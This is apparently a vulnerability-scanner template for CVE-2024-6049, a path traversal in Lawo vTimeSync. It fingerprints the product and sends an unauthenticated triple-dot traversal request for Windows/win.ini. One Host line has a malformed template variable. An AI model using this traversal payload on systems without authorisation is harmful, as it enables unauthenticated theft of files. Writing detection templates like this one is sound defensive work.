55 lines
1.9 KiB
YAML
55 lines
1.9 KiB
YAML
id: CVE-2024-6049
|
|
|
|
info:
|
|
name: Lawo AG vsm LTC Time Sync (vTimeSync) - Path Traversal
|
|
author: s4e-io
|
|
severity: high
|
|
description: |
|
|
The web server of Lawo AG vsm LTC Time Sync (vTimeSync) is affected by a "..." (triple dot) path traversal vulnerability. By sending a specially crafted HTTP request, an unauthenticated remote attacker could download arbitrary files from the operating system. As a limitation, the exploitation is only possible if the requested file has some file extension, e. g. .exe or .txt.
|
|
reference:
|
|
- https://lawo.com/lawo-downloads/
|
|
- https://r.sec-consult.com/lawo
|
|
- https://packetstormsecurity.com/files/182347/Lawo-AG-vsm-LTC-Time-Sync-Path-Traversal.html
|
|
- https://sec-consult.com/vulnerability-lab/advisory/unauthenticated-path-traversal-vulnerability-in-lawo-ag-vsm-ltc-time-sync-vtimesync/
|
|
- https://nvd.nist.gov/vuln/detail/cve-2024-6049
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2024-6049
|
|
cwe-id: CWE-32
|
|
epss-score: 0.00043
|
|
epss-percentile: 0.09833
|
|
metadata:
|
|
max-request: 2
|
|
tags: cve,cve2024,lawo,vtimesync,lfi
|
|
|
|
flow: http(1) && http(2)
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}
|
|
|
|
host-redirects: true
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "vTimeSync"
|
|
- "Lawo"
|
|
internal: true
|
|
case-insensitive: true
|
|
|
|
- raw:
|
|
- |
|
|
GET /.../.../.../.../.../.../.../.../.../Windows/win.ini HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains_all(body, "bit app support", "fonts", "extensions")'
|
|
- 'status_code == 200'
|
|
condition: and
|
|
# digest: 4a0a004730450221008626381f6efd22bfa54db433071cea6340a4d3b804d3a07e0751b9c471ea5ef80220329b7e50da600565b56a9ca74f6762ec3a7a12a34e6ef9074213182a447e0d4a:922c64590222798bb761d5b6d8e72950 |